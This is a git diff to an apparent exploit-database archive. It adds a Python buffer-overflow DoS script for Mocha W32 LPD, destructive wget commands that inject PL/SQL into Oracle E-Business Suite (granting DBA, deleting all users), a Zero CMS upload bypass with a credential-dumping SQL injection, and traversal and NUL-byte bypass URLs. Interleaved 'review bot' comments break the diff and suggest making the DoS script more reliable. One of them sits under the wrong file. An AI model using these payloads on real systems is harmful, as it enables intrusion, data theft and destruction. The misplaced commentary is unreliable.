diff --git a/files.csv b/files.csv
index 4a64a0099..169bf0a98 100755
--- a/files.csv
+++ b/files.csv
@@ -4504,7 +4504,7 @@ id,file,description,date,author,platform,type,port
 4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 (cmd.php) Remote Command Execution Vulnerability",2008-01-07,Houssamix,php,webapps,0
 4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 libclamav MEW PE Buffer Overflow Exploit",2008-01-07,"Thomas Pollet",linux,remote,0
 4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery Remote SQL Injection Exploit",2008-01-08,"Eugene Minaev",php,webapps,0
-4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
+4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 - Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
 4865,platforms/php/webapps/4865.txt,"evilboard 0.1a (sql/xss) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0
 4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0
 4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0
@@ -30359,7 +30359,7 @@ id,file,description,date,author,platform,type,port
 33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname param) - Persistent XSS Vulnerability",2014-06-09,"shyamkumar somana",php,webapps,80
 33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80
 33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 to 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80
-33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) - SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80
+33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80
 33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 'ShowPost.asp' Cross-Site Scripting Vulnerability",2010-03-04,Liscker,asp,webapps,0
 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0
 33706,platforms/php/webapps/33706.txt,"Drupal Prior to 6.16 and 5.22 Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0
@@ -30481,3 +30481,7 @@ id,file,description,date,author,platform,type,port
 33833,platforms/php/webapps/33833.txt,"Blog System 1.x Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0
 33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0
 33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0
+33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 Remote Buffer Overflow Vulnerability",2010-04-15,mr_me,windows,dos,0
+33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0
+33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0
+33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 Security Bypass and Denial of Service Vulnerabilities",2010-04-19,"Luigi Auriemma",windows,remote,0
diff --git a/platforms/asp/webapps/33840.txt b/platforms/asp/webapps/33840.txt
new file mode 100755
index 000000000..f0721090e
--- /dev/null
+++ b/platforms/asp/webapps/33840.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/39534/info
+
+Ziggurat Farsi CMS is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow an attacker to view arbitrary files within the context of the application. Information harvested may aid in launching further attacks.
+
+http://www.example.com/manager/backup.asp?bck=./../file.asp
\ No newline at end of file
diff --git a/platforms/multiple/remote/33839.txt b/platforms/multiple/remote/33839.txt
new file mode 100755
index 000000000..fa625df39
--- /dev/null
+++ b/platforms/multiple/remote/33839.txt
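Review bot: The single PoC on the last line of the 33840.txt hunk (`bck=./../file.asp`) climbs only one directory and targets a file that is still inside the web tree, so it does not by itself substantiate the "view arbitrary files" claim made two lines earlier; a reader reproducing this needs a request whose target lies outside the application directory to confirm the impact. The script also lives under `/manager/`, which looks like an administrative area, so whether this is reachable without an authenticated session is not established by the file. I would add one line under the URL: `Note: the traversal depth and authentication requirement for /manager/backup.asp are not confirmed here - verify both before rating this as unauthenticated arbitrary file read.`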
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/39510/info
+
+Oracle E-Business Suite Financials is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Oracle E-Business Suite 12 is vulnerable; other versions may be affected.
+
+$ export TARGET=?http://www.example.com:/OA_HTML?
+$ wget -O - ??$TARGET/OA.jsp? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end;?
+$ wget -O - ??$TARGET/OA.jsp? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;?
\ No newline at end of file
diff --git a/platforms/php/webapps/4864.txt b/platforms/php/webapps/4864.txt
index 3df63ef52..c116dee69 100755
--- a/platforms/php/webapps/4864.txt
+++ b/platforms/php/webapps/4864.txt
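Review bot: Both PoC commands in this hunk are destructive and the file carries no warning: the first attempts `grant dba to mom` (a persistent privilege grant if that account exists) and the second runs `delete from apps.fnd_user` followed by `commit`, which wipes the application user table. I would add a line before the commands: `WARNING: both requests modify the target database (DBA grant / deletion of all FND users); use a read-only query to verify the issue.` The three shell lines also contain mis-encoded quote characters (`?http://...?`, `??$TARGET/OA.jsp?`) and will not run as pasted; the doubled `??` before `$TARGET/OA.jsp` suggests an option name was lost in encoding, so the intended arguments should be checked against the referenced BID. Since the `query=` value is a full anonymous PL/SQL block (`begin execute immediate ... end;`), this is direct database code execution rather than a classic injection, which is worth stating for defenders who grep OA_HTML access logs for `jtfwcpnt.jsp?query=`.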
@@ -1,63 +1,63 @@
-[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
- | ____ __________ __ ____ __ |
- | /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ |
- | | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ |
- | | | | \ | |/ \ \___| | /_____/ | || | |
- | |___|___| /\__| /______ /\___ >__| |___||__| |
- | \/\______| \/ \/ |
-[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
- | Zero CMS Remote Arbitrary File Upload / SQL Injections |
-[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
- | Version: <= 1.0 Alpha (Last) |
-[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
- | Vendor: www.zero-cms.com |
-[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
- | Discovered by: KiNgOfThEwOrLd |
-[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
- | Intro: |
- | |
- | An attacker can bypass the avatar upload extension filter editing |
- | the contenet type propriety |
-[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
- | Exploit: |
- | |
- | Submit to index.php?act=usercp&action=avatar a request like this: |
- | |
- | -----------------------------4629606643545053171986629955\r\n |
- | Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n |
- | \r\n |
- | 20000\r\n |
- | -----------------------------4629606643545053171986629955\r\n |
- | Content-Disposition: form-data; name="avupload"; filename=" |
- | [FILENAME].[EVIL_EXTENSION]"\r\n |
- | Content-Type: image/jpeg\r\n |
- | \r\n |
- | [EVIL_CODE]\n |
- | \r\n |
- | -----------------------------4629606643545053171986629955\r\n |
- | Content-Disposition: form-data; name="submit"\r\n |
- | \r\n |
- | Upload\r\n |
- | -----------------------------4629606643545053171986629955-\r\n|
-[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
- | SQL Injections: |
- | |
- | The most of the variable related with the database are not properly|
- | checked. Then, we get a lots of possible sql injections. |
-[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
- | Some Examples: |
- | |
- | index.php?act=poll&mode=view&id=%27 |
- | forums/index.php?f=%27 |
- | forums/index.php?t=%27 |
-[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
- | An Exploit Example: |
- | |
- | index.php?act=poll&mode=view&id=9999+union+all+select+1,username, |
- | password,email,5,6,7,8,9,10,11,12,13,14+from+zc_members |
-[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
- | Surelly there are other not filtred vars, but i don't feel like to |
- | check, if u want u can find that yourself, dont you? :P |
-[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
-
-# milw0rm.com [2008-01-08]
+[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
+ | ____ __________ __ ____ __ |
+ | /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ |
+ | | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ |
+ | | | | \ | |/ \ \___| | /_____/ | || | |
+ | |___|___| /\__| /______ /\___ >__| |___||__| |
+ | \/\______| \/ \/ |
+[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
+ | Zero CMS Remote Arbitrary File Upload / SQL Injections |
+[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
+ | Version: <= 1.0 Alpha (Last) |
+[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
+ | Vendor: www.zero-cms.com |
+[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
+ | Discovered by: KiNgOfThEwOrLd |
+[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
+ | Intro: |
+ | |
+ | An attacker can bypass the avatar upload extension filter editing |
+ | the contenet type propriety |
+[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
+ | Exploit: |
+ | |
+ | Submit to index.php?act=usercp&action=avatar a request like this: |
+ | |
+ | -----------------------------4629606643545053171986629955\r\n |
+ | Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n |
+ | \r\n |
+ | 20000\r\n |
+ | -----------------------------4629606643545053171986629955\r\n |
+ | Content-Disposition: form-data; name="avupload"; filename=" |
+ | [FILENAME].[EVIL_EXTENSION]"\r\n |
+ | Content-Type: image/jpeg\r\n |
+ | \r\n |
+ | [EVIL_CODE]\n |
+ | \r\n |
+ | -----------------------------4629606643545053171986629955\r\n |
+ | Content-Disposition: form-data; name="submit"\r\n |
+ | \r\n |
+ | Upload\r\n |
+ | -----------------------------4629606643545053171986629955-\r\n|
+[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
+ | SQL Injections: |
+ | |
+ | The most of the variable related with the database are not properly|
+ | checked. Then, we get a lots of possible sql injections. |
+[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
+ | Some Examples: |
+ | |
+ | index.php?act=poll&mode=view&id=%27 |
+ | forums/index.php?f=%27 |
+ | forums/index.php?t=%27 |
+[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
+ | An Exploit Example: |
+ | |
+ | index.php?act=poll&mode=view&id=9999+union+all+select+1,username, |
+ | password,email,5,6,7,8,9,10,11,12,13,14+from+zc_members |
+[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
+ | Surelly there are other not filtred vars, but i don't feel like to |
+ | check, if u want u can find that yourself, dont you? :P |
+[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
+
+# milw0rm.com [2008-01-08]
diff --git a/platforms/windows/dos/33838.py b/platforms/windows/dos/33838.py
new file mode 100755
index 000000000..382806051
--- /dev/null
+++ b/platforms/windows/dos/33838.py
@@ -0,0 +1,73 @@
+source: http://www.securityfocus.com/bid/39498/info
+
+Mocha W32 LPD is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
+
+Successful exploits may allow attackers to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+This issue affects W32 LPD 1.9; other versions may be vulnerable as well.
+
+#!/usr/bin/python
+# #################################################################
+# Mocha LPD v1.9 Remote Buffer Overflow DoS PoC
+# Author: mr_me
+# Software Link: http://mochasoft.dk/lpd.htm
+# Version: 1.9
+# Tested on: Windows XP SP3
+# Advisory: http://www.corelan.be:8800/advisories.php?id=10-023
+# Greetz to: Corelan Security Team
+# http://www.corelan.be:8800/index.php/security/corelan-team-members/
+# ##################################################################
+# Script provided 'as is', without any warranty.
+# Use for educational purposes only.
+# Do not use this code to do anything illegal !
+# Corelan does not want anyone to use this script
+# for malicious and/or illegal purposes.
+# Corelan cannot be held responsible for any illegal use.
+#
+# Note : you are not allowed to edit/modify this code.
+# If you do, Corelan cannot be held responsible for any damages.
+# ##################################################################
+# Access violation here:
+# MOV ECX,DWORD PTR DS:[EBX]
+#
+# The registers:
+# EAX 00A2F978 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaa"..
+# ECX 00006161
+# EDX 00A20168
+# EBX 61616161
+# ESP 0012F4B8
+# EBP 0012F6D4
+# ESI 00A2F970 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaa"..
+# EDI 61616161
+# EIP 7C91AB8E ntdll.7C91AB8E
+
+import sys, socket
+
+print "********************************************************"
+print " Mocha LPD Buffer Overflow DoS"
+print " by mr_me"
+print " http://net-ninja.net/ - mr_me(AT)corelan.be"
+print "********************************************************"
+
+if len(sys.argv) < 3:
+ print "Usage: " + sys.argv[0] + " "
+ sys.exit(0)
+
+exploit = '\x05\x64\x65\x66\x61\x75\x6c\x74\x20'
+exploit = '\x41' * 1500
+exploit += '\x20\x61\x6c\x6c\x0a'
+
+host = sys.argv[1]
+port = int(sys.argv[2])
+
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+try:
+ connect = s.connect((host,port))
+except:
+ print "[-] Cant connect!"
+
+s.send("\x02")
+print "[+] Sending evil payload.. ph33r o.O"
+s.send(exploit)
+print '[+] Server DoSed!'
+s.close()
diff --git a/platforms/windows/remote/33841.txt b/platforms/windows/remote/33841.txt
new file mode 100755
index 000000000..13b1b852a
--- /dev/null
+++ b/platforms/windows/remote/33841.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/39544/info
+
+HTTP File Server is prone to multiple vulnerabilities including a security-bypass issue and a denial-of-service issue.
+
+Exploiting these issues will allow an attacker to download files from restricted directories within the context of the application or cause denial-of-service conditions.
+
+http://www.example.com/protected_folder/secret_file.txt%00
+http://www.example.com/?search=%25%25
\ No newline at end of file
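Review bot: The bare `except:` after `s.connect((host,port))` only prints a message and then falls through to `s.send("\x02")`, so a refused connection ends in a traceback on an unconnected socket instead of a clean exit; it should read `except socket.error:` / `print "[-] Cant connect!"` / `sys.exit(1)`. The first assignment `exploit = '\x05\x64...\x20'` (which decodes to `\x05default `) is dead code because the next line rebinds `exploit` to `'\x41' * 1500` rather than appending, so the payload actually sent is `\x02` followed by 1500 `A`s and ` all\n` — either the first line was meant to be `+=` or it should be removed so the PoC documents what it really sends. The usage string `" "` after `sys.argv[0]` appears truncated (presumably `<host> <port>` was lost when the file was extracted) and is worth restoring. Finally, `s.send(exploit)` can return a partial write; `s.sendall(exploit)` guarantees the whole 1.5 KB buffer leaves the socket, which matters if the trigger depends on the full length.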
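Review bot: The two PoC URLs at the end of the 33841.txt hunk are unlabelled, so a reader has to guess which one is the security bypass and which one the denial of service described above; I would prefix each with a one-line label such as `# security bypass: trailing %00 (NUL) appended to a path inside a restricted folder` and `# denial of service: search request with %25%25 ("%%")`. That the NUL byte defeats the folder access check and that the doubled percent causes the DoS is inferred from the URLs and the description, not stated in the file, and should be confirmed against the referenced BID before the labels are added.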